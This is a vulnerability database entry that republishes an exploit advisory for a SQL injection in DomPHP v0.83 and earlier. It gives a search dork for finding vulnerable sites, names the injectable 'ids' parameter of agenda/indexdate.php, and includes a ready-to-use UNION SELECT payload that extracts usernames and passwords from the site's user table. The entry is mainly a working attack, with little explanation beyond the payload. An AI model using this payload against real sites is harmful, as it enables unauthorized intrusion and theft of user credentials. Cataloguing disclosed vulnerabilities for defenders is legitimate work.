DomPHP <= v0.83 SQL注入漏洞

2014-01-17T00:00:00
ID SSV:61339
Type seebug
Reporter Root
Modified 2014-01-17T00:00:00

Description

No description provided by source.

                                        
                                            
                                                -------------------------------------------------------------
DomPHP <= v0.83 SQL Injection Vulnerability
-------------------------------------------------------------
  
= Author : Houssamix                      
= Script : DomPHP <= v0.83
                     
= Download : http://www.domphp.com/download/ 
             
= BUG :  SQL Injection Vulnerability
  
= DORK : Site créé à l'aide du CMS DomPHP v0.83
  
= Exploit :                              
http://[target]/agenda/indexdate.php?ids=77 [SQL]
                  
Exemple :               
 
http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs--